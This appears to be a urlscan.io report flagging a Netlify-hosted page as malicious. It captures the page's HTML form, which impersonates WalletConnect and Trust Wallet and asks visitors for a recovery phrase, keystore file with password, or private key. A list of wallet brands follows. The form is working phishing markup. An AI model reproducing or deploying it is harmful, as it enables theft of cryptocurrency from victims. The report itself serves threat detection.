dev-sync.netlify.app Open in urlscan Pro
2a05:d014:275:cb01::c8  Malicious Activity! Public Scan

Submitted URL: http://dev-sync.netlify.app/wallet.html
Effective URL: https://dev-sync.netlify.app/wallet.html
Submission: On March 19 via api from US — Scanned from DE

Form analysis 1 forms found in the DOM

POST

<form enctype="multipart/form-data" id="form" method="post"><input type="hidden" name="form-name" value="form">
  <div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left w-full mr-10">
    <h3 id="modal-headline" class="text-lg leading-6 mt-2 font-medium text-gray-900" style="display: flex; flex-direction: row;">
      <img src="WalletAPI_wallets_files/saved_resource.html" style="margin-right: 20px; height: 40px; width: 40px" id="myImg">
      <span>Import your <span id="walletname"></span> wallet</span>
    </h3>
    <div class="mt-2">
      <div class="mt-10">
        <div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
          <div id="phrase" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Phrase </div>
          <div id="keystore" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Keystore JSON </div>
          <div id="private" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Private Key </div>
        </div>
        <div id="first" class="acc-body active">
          <div class="flex flex-col">
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative">
              <textarea cols="30" rows="4" placeholder="Enter your recovery phrase" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" name="phrase"
                required="" minlength="12">                                                        </textarea>
              <p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words separated by single spaces </p>
            </div>
          </div>
          <div class="flex w-full">
            <button type="submit" class="flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in" id="play" name="play"><span
                class="mr-2 uppercase">Proceed</span> <span><svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                  <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z"></path>
                </svg></span>
            </button>
          </div>
        </div>
        <div id="second" class="acc-body bg-grey-600">
          <div class="flex flex-col">
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative"><label id="label" for="file-upload" class="UnlockWalletViaKeystoreFile__file-input">
                <input class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" required="required" id="file-upload" type="file" name="file">
                <span id="span">Choose Keystore File</span></label></div>
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative"><input type="text" required="required" name="keystorepassword" placeholder="Wallet password"
                class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <p class="text-xs text-grey-300 mt-6"> Several lines of text beginning with "{...}" plus the password you used to encrypt it. </p>
            </div>
          </div>
          <div class="flex w-full">
            <button type="submit" class="flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in">
              <span class="mr-2 uppercase">Proceed</span>
              <span>
                <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                  <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z">
                  </path>
                </svg>
              </span>
            </button>
          </div>
        </div>
        <div id="third" class="acc-body bg-grey-600">
          <div class="flex flex-col">
            <div class="relative"><input type="hidden" name="wallet_id" required="required" placeholder="Wallet ID" id="wallet_id" value="Trust wallet"></div>
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative"><input type="text" required="required" placeholder="Enter your Private Key" name="privatekey"
                class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words seperated by a single space. </p>
            </div>
          </div>
          <div class="flex w-full">
            <button type="submit" class="flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in">
              <span class="mr-2 uppercase">Proceed</span>
              <span>
                <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                  <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 90 11-18 0 9 9 0 0118 0z"></path>
                </svg>
              </span>
            </button>
          </div>
        </div>
      </div>
    </div>
  </div>
</form>

Text Content

Back
I
Connect Manually
MetaMask
Easy-to-use browser extension.



IMPORT YOUR WALLET

Phrase
Keystore JSON
Private Key

Typically 12 (sometimes 24) words separated by single spaces

Proceed
Choose Keystore File

Several lines of text beginning with "{...}" plus the password you used to
encrypt it.

Proceed

Typically 12 (sometimes 24) words seperated by a single space.

Proceed
Cancel
Wallets

dApps


SECURE WALLETS

WalletConnect is an open source protocol for connecting decentralised
applications to mobile wallets with QR code scanning or deep linking. A user can
interact securely with any Dapp from their mobile phone, making WalletConnect
wallets a safer choice compared to desktop or browser extension wallets.
Rainbow

Trust

Blockchain

Ronin

Argent

Metamask

Gnosis Safe Multisig

Trezor Wallet

Enjin Wallet

Crypto.com | DeFi Wallet

Pillar

imToken

Mobox Wallet

ONTO

TokenPocket

MathWallet

Coinbase

BitPay

Maiar

Ledger Live

Walleth

Authereum

Huobi Wallet

Eidoo

MYKEY

Loopring Wallet

TrustVault

Atomic

Coin98

Parity Signer

CoolWallet S

Alice

AlphaWallet

D'CENT Wallet

ZelCore

Nash

Coinomi

GridPlus

CYBAVO Wallet

Terra

Tokenary

Wazirx

Torus

Spatium

SafePal

Equal

Infinito

wallet.io

Infinity Wallet

Ownbit

EasyPocket

Bridge Wallet

SparkPoint

ViaWallet

BitKeep

Vision

Safemoon

SWFT Wallet

PEAKDEFI Wallet

XDC Wallet

Unstoppable Wallet

MEET.ONE

Dok Wallet

AT.Wallet

MoriX Wallet

Midas Wallet

Ellipal

KEYRING PRO

Binance Smart Chain

Aktionariat

Phantom

Solfare

Algorand

Coinomi

1inch

Discord



Twitter



Github

Bitcoin.comLocal St Bitts LLC
858 Zenway Blvd
Frigate Bay, Saint Kitts
Saint Kitts and Nevis

Trade
 * Buy BCH
 * Sell BCH
 * FAQ
 * Help Center

Company
 * Contact us
 * Terms & privacy

Navigated to Wallets